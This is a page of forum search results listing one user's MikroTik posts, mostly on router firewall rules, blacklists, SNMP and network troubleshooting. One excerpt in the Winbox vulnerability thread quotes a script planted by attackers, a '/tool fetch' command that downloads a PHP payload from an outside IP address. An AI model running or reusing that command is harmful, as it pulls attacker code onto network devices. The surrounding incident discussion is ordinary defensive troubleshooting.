Community discussions

Search found 194 matches

by 43north
Tue Nov 20, 2018 10:33 pm
Forum: The Dude
Topic: Dude 6.41.2 lost SNMP interfaces
Replies: 16
Views: 1453

Re: Dude 6.41.2 lost SNMP interfaces

Just an update..... Switching to SNMP v2 fixed all my links in the newer Dude.
by 43north
Tue Nov 20, 2018 5:01 am
Forum: The Dude
Topic: Dude 6.41.2 lost SNMP interfaces
Replies: 16
Views: 1453

Re: Dude 6.41.2 lost SNMP interfaces

Migrated from an old Version 4.0beta3 to 6.42.9 and no SNMP interfaces anywhere. Tagging this to track for any updates.
by 43north
Fri Oct 19, 2018 4:37 pm
Forum: General
Topic: Weird interface graphing
Replies: 18
Views: 739

Re: Weird interface graphing

We replaced our 1016 almost two weeks ago with a brand new one. I forgot about this thread I had posted in and went and checked the graph on the interface that we had gaps on in the past. I have been watching the graph for about ten minutes now and there are no longer any gaps in the graph. We are s...
by 43north
Fri Sep 21, 2018 11:37 pm
Forum: General
Topic: Failed to pre-process ph2 packet.
Replies: 3
Views: 1022

Re: Failed to pre-process ph2 packet.

Did you find a solution to this? I have getting exact same error in IPSEC log for one of my tunnel policies. Just started last week and no changes to the router that should have caused this. Only fix is to reboot the router and then it works. Flushed SAs and that did not help.
by 43north
Tue Sep 18, 2018 7:24 am
Forum: General
Topic: Weird interface graphing
Replies: 18
Views: 739

Re: Weird interface graphing

Following this lost, we have a 1016 on .26 firmware as well. Our graphs are mostly full on a interface but have some blank spaces in the graph even though it is the main trunk port with constant traffic. Let us know if your firmware upgrades help.
by 43north
Tue Sep 18, 2018 7:11 am
Forum: General
Topic: Stopping connections to TCP port 1720
Replies: 6
Views: 341

Re: Stopping connections to TCP port 1720

@mt99 I am glad you created this topic, I was doing the same thing a couple of weeks ago!!!! This makes sense now for me too, cable modem that can do phone as well. Ugh too funny
by 43north
Mon Sep 10, 2018 9:25 pm
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

I'm in a holding pattern while my lawyer researches the EU "GDPR" laws. It's looking like I will not be able to use 3rd party honeypots, as the GDPR requires companies to allow users to delete any data collected from there. That means that anyone with a honeypot running on their router will be able...
by 43north
Mon Sep 10, 2018 9:06 pm
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 275
Views: 38450

Re: Winbox vulnerability: please upgrade

May i ask, how is it possible to attacker to load up the know scripts and modify firewall, sock proxy, etc. if in IP/Services only winbox and ssh is allowed,but they are limited to connect from known prefixes? It's even happened in 6.42.1 or 6.42.3 I have understood that even if you limit the conne...
by 43north
Mon Sep 10, 2018 4:58 am
Forum: General
Topic: Anyone use their "Drop All" input rule to make a black list of addresses?
Replies: 7
Views: 485

Re: Anyone use their "Drop All" input rule to make a black list of addresses?

As of today I have added port 10001 to my firewall also.. We have many people trying to scan for UBNT hardware! So my routers drop it by default now and log the IPs who are trying to use it.. Great write up and information, thanks for taking the time. Reference the 10001 and UBNT, I recently read a...
by 43north
Sun Sep 09, 2018 8:41 am
Forum: General
Topic: Anyone use their "Drop All" input rule to make a black list of addresses?
Replies: 7
Views: 485

Re: Anyone use their "Drop All" input rule to make a black list of addresses?

Hey guys thanks for the reply. I always like to see other people's firewall rules and thoughts. @samrock I see other people have these progress staged address lists. What is the thought behind that? Just to keep the ones that are knocking a lot in check for a longer period of time? I am currently ad...
by 43north
Sat Sep 08, 2018 8:08 am
Forum: General
Topic: Anyone use their "Drop All" input rule to make a black list of addresses?
Replies: 7
Views: 485

Anyone use their "Drop All" input rule to make a black list of addresses?

Just curious if anyone takes their Drop All input rule and makes an address "Block" list from the source addresses that hit the drop all rule? I have been tracking all my drop all rules by creating a test list. Just wonder if anyone incorporates these addresses into an actual block list? Pros or Con...
by 43north
Tue Aug 28, 2018 3:35 am
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

Dave,
Still very interested in learning how to setup a honeypot to collect addresses. Even if you are not to the point to accept other people's honeypot lists, could you do a brief write up to teach us the best way to setup a honeypot? Thanks!
by 43north
Sun Aug 19, 2018 8:27 pm
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

As you can tell, I've slowed down on development. Out of the 100+ people who filled out the notification form, more than 60% says they will not pay for this type of service. Only about 15 say they will pay a commercial product. So, I'm going to take my time with it and try earning some income in ot...
by 43north
Wed Aug 15, 2018 7:43 am
Forum: General
Topic: Question on Firewall and blacklists
Replies: 4
Views: 282

Re: Question on Firewall and blacklists

Yes. The Input chain only affects traffic that will terminate on the router itself. The Forward chain affects traffic that will pass through the router. Note that you have an allow connected and related traffic in the Forward chain, that rule will allow responses to one of your users who connects t...
by 43north
Wed Aug 15, 2018 4:17 am
Forum: General
Topic: Question on Firewall and blacklists
Replies: 4
Views: 282

Question on Firewall and blacklists

So I have built a blacklist in my Tik. I have a filter rule on the INPUT chain to drop any traffic from SRC ADDRESS list BLOCK. That is all fine for anything in the block list that is coming in to the router. My confusion is that lets say address 185.168.4.4 is on the block list. Lets say this addre...
by 43north
Wed Aug 08, 2018 8:44 pm
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

on the flip side, if anyone is in Southern California (Rancho Cucamonga / Ontario / Pomona / San Bernardino) you are hit me up and I'd love to grab coffee and chat. Dave, although I am not in your area, I am next door in Idaho. I am very interested in setting up honeypots where I am at to contribut...
by 43north
Wed Aug 08, 2018 2:52 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 275
Views: 38450

Re: Winbox vulnerability: please upgrade

It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C as you also mentioned...
As I mentioned my file was empty as well, makes sense with what you guys are saying.
by 43north
Tue Aug 07, 2018 7:59 pm
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

Oh BTW guys, my Honeypots alone are reporting over 37,000 ACTIVE botnet IP's for the last 12 hours. Those IP's will NOT be included in the free list. Dave please don't limit the Beta, don't let this guy be the driver for that. It is not worth it and hurts us that are your loyal followers. I am usin...
by 43north
Tue Aug 07, 2018 7:24 am
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

currently, the priorities are pretty basic. #1 is a short list of about 2000, consisting of just the most common botnet attacks. If I end up offering a free tier, this will be it. #2 is a longer list of 30,000 to 40,000 IP's and subnets that includes #1, also adds most of the more common crap out t...
by 43north
Mon Aug 06, 2018 5:47 am
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

Just put the script on my home CCR1009 and am sooooo stoked to be using your service again. Just the piece of mind will be huge for me. Will move it into production on my work Tiks after testing a few days at home. EDIT: Also Dave can you educate us on the Priority Levels 1,2,3 that are part of the ...
by 43north
Sun Aug 05, 2018 8:37 pm
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 275
Views: 38450

Re: Winbox vulnerability: please upgrade

Thats it! THX! In scripts are /tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now. Thanks I grabbed the PHP file before fixing my router. I opened it with notepad a...
by 43north
Sun Aug 05, 2018 10:09 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 275
Views: 38450

Re: Winbox vulnerability: please upgrade

Honestly I had never read the announcements section of the forum, I do now...... 43north ... please do not take it personally :-) but this is quotation of the month ... maybe even of the year. I don't take it personal at all. It is my fault for not being more in tune. I own it 100%. Super frustrati...
by 43north
Sun Aug 05, 2018 9:42 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 275
Views: 38450

Re: Winbox vulnerability: please upgrade

43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier even you have had (I suppose) knowledge of the problem? Honestly I had never read the announcements section of the forum, I do now...... and will from here on out. My ignorance cost me, I know....
by 43north
Sun Aug 05, 2018 9:00 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 275
Views: 38450

Re: Winbox vulnerability: please upgrade

@normis we were hit with this on July 22nd. I was on a vulnerable firmware and the only service we had open was winbox but with no filtering and on the default port :(. I caught it in less than 24 hours because of the log file. I had a backup config from a few days prior to the attack which I restor...
by 43north
Thu Aug 02, 2018 8:02 am
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

I am looking forward to it and will definitely be a paying customer!!!!
by 43north
Wed Jul 11, 2018 9:53 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

Quick update..... So I ran a traceroute on my Mikrotik to a number of different sites. Take a look..... the offending 192.168.62.185 address is number three on every traceroute. This has to be part of my cable company internet stack. I am just trying to figure out if it is a problem on their end or ...
by 43north
Sat Jul 07, 2018 3:29 am
Forum: General
Topic: Anyone using Ubiquiti branded SFP transceivers in your Mikrotik routers?
Replies: 4
Views: 382

Anyone using Ubiquiti branded SFP transceivers in your Mikrotik routers?

Title says it all. I have a Mikrotik CCR1016 and all Ubiquiti Edgeswitches on my network. Wondering if any of you are using the Ubiquiti branded fiber transceivers in your Mikrotik routers and if they are playing well with it?
by 43north
Tue Jul 03, 2018 4:46 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

Do you have VMPlayer, WMWorkstation, VirtualBox etc. installed on any computer in your LAN? These programs create virtual interfaces and assign them "local networks pools" addresses and offer bridging with real interface so you can see packets originating from these virtal interfaces leaking to you...
by 43north
Mon Jul 02, 2018 5:45 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

Don't give up yet @CZFan and @R1CH
by 43north
Fri Jun 29, 2018 10:24 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

I would then guess the next step is for a diagram of the network and current config of your router One more thought..... We have a static IP from our cable company for internet. Cable modem plugs into router WAN port and is configured for that static address. I went and plugged my laptop directly i...
by 43north
Fri Jun 29, 2018 9:42 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

Is it in IP Routes? No not at all, craziest thing! I have seen it happen on four of our machines on our 10 subnet, three of them in the same building on the same VLAN and the other in a different building on a different VLAN. Same 192 address and MAC every time. Always to Microsoft addresses. So we...
by 43north
Fri Jun 29, 2018 9:27 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

What is 192.168.62.185? I suspect it is the gateway for the device you posted the logs for? You can see from the log screenshot posted traffic is coming from a Public IP, but your gateway is reporting this No I can not find this address anywhere on my network, I only use 10 subnet, I do use 192 sub...
by 43north
Fri Jun 29, 2018 4:54 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

Any thoughts @R1CH?
by 43north
Thu Jun 28, 2018 6:27 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

That's correct, it's caused by a non-translated packet exiting from a remote NAT and making it across the internet with an invalid source IP. They're quite rare, but if you run a busy enough network / website you'll see quite a lot of them. Some stats from one of my websites which filter these on I...
by 43north
Thu Jun 28, 2018 5:33 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

This is caused by a combination of bad ISPs that don't do BCP38 and bad routers that don't NAT properly. An outbound packet from your network goes across the internet to some host behind a poor quality NAT router. The host PC / network responds with an ICMP error (TTL exceeded, port unreachable or ...
by 43north
Thu Jun 28, 2018 5:05 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

It means TTL reached 0 during transit, look for routing loops, etc
Where would I start to look for routing loops? I dont have anything in log files that would indicate routing loop. Is there certain log files I can turn on to show this?
by 43north
Thu Jun 28, 2018 4:35 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

Maybe someone from staff has a second fixed IP address set? The source mac is rather strange, as it belongs to ARRIS Group which is a cable modem manufacturer. Maybe they have some auto-aliased internal IP in place. OK well that makes sense for the source MAC and I should have looked that MAC up to...
by 43north
Thu Jun 28, 2018 8:08 am
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Why am I getting this firewall entry???

So.... All my staff traffic is on 10 subnet, all guest traffic on 192 subnet. So I am getting this occasional firewall logs for address 192.168.62.185. This is not even in my DHCP pool, ARP, or anywhere that I can find on my network. The machines on the 10 subnet in the photo are in the same office ...
by 43north
Tue Jun 26, 2018 5:00 pm
Forum: General
Topic: When WAN connection fails over to backup connection, get these log errors. [SOLVED]
Replies: 5
Views: 244

Re: When WAN connection fails over to backup connection, get these log errors. [SOLVED]

Ahhhhhh okay so I use a Cradlepoint with IP passthrough for the secondary WAN, I just looked at the MTU for the LTE on the cradlepoint is 1428 and on my mikrotik for that interface it was still on the default 1500. Would that possibly cause the issues I am seeing as well as the intermittent internet...
by 43north
Tue Jun 26, 2018 10:07 am
Forum: General
Topic: When WAN connection fails over to backup connection, get these log errors. [SOLVED]
Replies: 5
Views: 244

Re: When WAN connection fails over to backup connection, get these log errors. [SOLVED]

So why is it doing this for secondary WAN but not for primary Wan?
by 43north
Tue Jun 26, 2018 9:07 am
Forum: General
Topic: When WAN connection fails over to backup connection, get these log errors. [SOLVED]
Replies: 5
Views: 244

When WAN connection fails over to backup connection, get these log errors. [SOLVED]

Very strange, have two WAN connections. Nothing fancy just a primary one and then a cellular modem as a backup if the primary goes down. Whenever it switches to the backup my log gets flooded with this firewall hits. Why is that? Also the connection has problems when on the backup. I have a separate...
by 43north
Sun Apr 01, 2018 3:32 am
Forum: Announcements
Topic: v6.41.3 [current]
Replies: 139
Views: 22772

Re: v6.41.3 [current]

Can someone confirm for me specifically with the DHCP issue on a bridge only occurs if you have the DHCP server on an individual physical interface that is part of a bridge? I have my DHCP assigned directly to the bridge itself, will I have issues with it setup this way or is that the way it is work...
by 43north
Wed Jan 10, 2018 7:00 am
Forum: General
Topic: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch
Replies: 34
Views: 10723

Re: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch

Send me an email, it is listed above.
by 43north
Thu Dec 14, 2017 11:25 pm
Forum: RouterOS v6 RC and v7 BETA
Topic: router was rebooted without proper shutdown, probably kernel failure
Replies: 27
Views: 5790

Re: router was rebooted without proper shutdown, probably kernel failure

Yeah I was already on 6.40.5 but what I hadnt done is upgraded the actual routerboard firmware itself. I upgraded that as well yesterday. I have only had a single crash yesterday morning so keeping an eye on things.
by 43north
Wed Dec 13, 2017 9:25 pm
Forum: RouterOS v6 RC and v7 BETA
Topic: router was rebooted without proper shutdown, probably kernel failure
Replies: 27
Views: 5790

Re: router was rebooted without proper shutdown, probably kernel failure

Any update on this? I experienced a similar crash this morning on our main CCR1016. I sent the supout file to Mikrotik but any updates on what happened?
by 43north
Tue Dec 05, 2017 8:44 am
Forum: General
Topic: Why is ping now blocked by my firewall rule for drop invalid packets?
Replies: 7
Views: 604

Re: Why is ping now blocked by my firewall rule for drop invalid packets?

The ICMP rule is there, but it is below the invalid drop rule. Now it has always been below and never been an issue. Just for kicks I moved it to the top of the list and it still didnt matter, ping wont go through unless I disable the drop invalid rule. Super weird....
by 43north
Tue Dec 05, 2017 6:12 am
Forum: General
Topic: Why is ping now blocked by my firewall rule for drop invalid packets?
Replies: 7
Views: 604

Why is ping now blocked by my firewall rule for drop invalid packets?

So I have had the same setup for quite a while, nothing has changed other than new firmware..... Two routers in OSPF config. When I try and ping from my desktop computer to network switches on the other router it just times out. But on that router if I just disable my drop invalid packets rule, the ...